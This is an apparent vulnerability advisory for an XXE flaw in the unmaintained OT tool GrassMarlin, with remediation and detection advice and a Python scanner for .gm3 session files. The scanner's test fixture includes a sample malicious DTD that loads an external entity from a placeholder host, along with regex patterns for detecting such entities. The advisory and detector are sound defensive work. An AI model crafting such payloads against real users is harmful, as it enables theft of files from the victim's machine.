Full Report
GrassMarlin leaks sensitive information, provided your targeted phishing skills are sharp enough
Analysis Summary
# Vulnerability: XML External Entity (XXE) in NSA GrassMarlin
## CVE Details
- **CVE ID:** CVE-2026-6807
- **CVSS Score:** 5.5 (Medium)
- **CWE:** CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products:** GrassMarlin (NSA-developed OT networking tool)
- **Versions:** All versions (Product is End-of-Life as of 2017)
- **Configurations:** Systems using the version of Java bundled in the original installer; systems where users ingest/open externally provided session files (`.gm3`).
## Vulnerability Description
The vulnerability is an XML External Entity (XXE) flaw: the XML parser used to load session data does not restrict the resolution of external entities. GrassMarlin saves session data as a collection of XML files (node lists, edges, and metadata) bundled into a ZIP archive with a `.gm3` extension. By crafting a malicious `.gm3` file whose Document Type Definition (DTD) references an external host, an attacker can induce Out-of-Band (OOB) exfiltration of arbitrary files from the host system. The exploit avoids triggering error logging by base64-encoding the exfiltrated content and transmitting it across multiple message chunks.
## Exploitation
- **Status:** PoC available (Published on GitHub by Rapid7 researcher Anna Quinn)
- **Complexity:** Medium (Requires crafting a specific malicious session file and bypassing certain Java input constraints)
- **Attack Vector:** Local (via social engineering/phishing to trick a user into opening a malicious `.gm3` session file)
## Impact
- **Confidentiality:** High (Successful exploitation allows for the unauthorized exfiltration of arbitrary files from the victim's machine)
- **Integrity:** Low/None
- **Availability:** Low (Potential to cause errors in the application console)
## Remediation
### Patches
- **None:** GrassMarlin reached End-of-Life (EOL) in 2017 and is no longer maintained by the NSA. No official patches will be released.
### Workarounds
- **Isolate Systems:** Ensure Industrial Control Systems (ICS) and SCADA networks are not accessible via the open internet.
- **Network Segmentation:** Isolate firewalled OT devices from business networks.
- **Secure Remote Access:** Use encrypted, authenticated methods for any required remote access.
- **File Integrity:** Only open session files (`.gm3`) from trusted, internally verified sources.
## Detection
- **Indicators of Compromise:**
  - Unexpected outbound network traffic to unknown external hosts, particularly on ports associated with DTD fetching or OOB exfiltration.
  - Presence of suspicious `.gm3` files received via email or untrusted file shares.
- **Detection Methods and Tools:**
  - Network traffic analysis (NSM) to detect base64-encoded strings in outbound messages from OT management workstations.
  - Security awareness training focusing on phishing attempts targeting OT engineers.
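Because no patch exists, the "only open trusted session files" workaround can be backed by a pre-open check. The script below is an added example, not GrassMarlin code or part of the published PoC: it unzips a `.gm3` bundle in memory and flags any XML member carrying a DTD, escalating when the DTD declares an external (SYSTEM/PUBLIC) entity. The member names and the `dtd-host.invalid` URL are constructed for the sample.

```python
# Added example, not GrassMarlin code: pre-open check for a .gm3 session bundle
# (a ZIP of XML files). Saved session XML has no reason to carry a DTD, so any
# <!DOCTYPE> is reported; one declaring an external entity (SYSTEM/PUBLIC with
# a URI) is reported as high severity.
import io
import re
import zipfile

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity whose definition points outside the document.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b[^>]*?"
    rb"(?P<uri>(?:https?|ftp|file|jar):[^\s\"'>]+)",
    re.IGNORECASE | re.DOTALL,
)

def scan_gm3(data: bytes) -> list:
    """Return one finding per XML member of the bundle that carries a DTD."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".xml"):
                continue
            head = zf.read(info.filename)[:65536]  # a DTD precedes the root element
            if not DOCTYPE_RE.search(head):
                continue
            ext = EXTERNAL_ENTITY_RE.search(head)
            findings.append({
                "member": info.filename,
                "severity": "high" if ext else "medium",
                "external_uri": ext.group("uri").decode(errors="replace") if ext else None,
            })
    return findings

def build_gm3(members: dict) -> bytes:
    """Build a .gm3-style ZIP in memory from {name: xml_bytes} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()

# Constructed samples; the host name is a placeholder, not a real indicator.
CLEAN_GM3 = build_gm3({
    "nodes.xml": b'<?xml version="1.0"?><nodes><node ip="10.0.0.5"/></nodes>',
})
SUSPECT_GM3 = build_gm3({
    "nodes.xml": b'<?xml version="1.0"?><!DOCTYPE nodes [<!ENTITY % ext SYSTEM '
                 b'"http://dtd-host.invalid/x.dtd"> %ext;]><nodes/>',
})
```

Run `scan_gm3()` over a received `.gm3` before opening it in GrassMarlin; an empty result means no DTD was found, while a `high` finding names the external URI the DTD would contact.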
## References
- **Vendor Advisories:** hxxps[://]www[.]cisa[.]gov/news-events/ics-advisories/icsa-26-118-01
- **PoC Repository:** hxxps[://]github[.]com/SecTestAnnaQuinn/Grassmarlin-CVE-2026-6807-XXE-POC/tree/main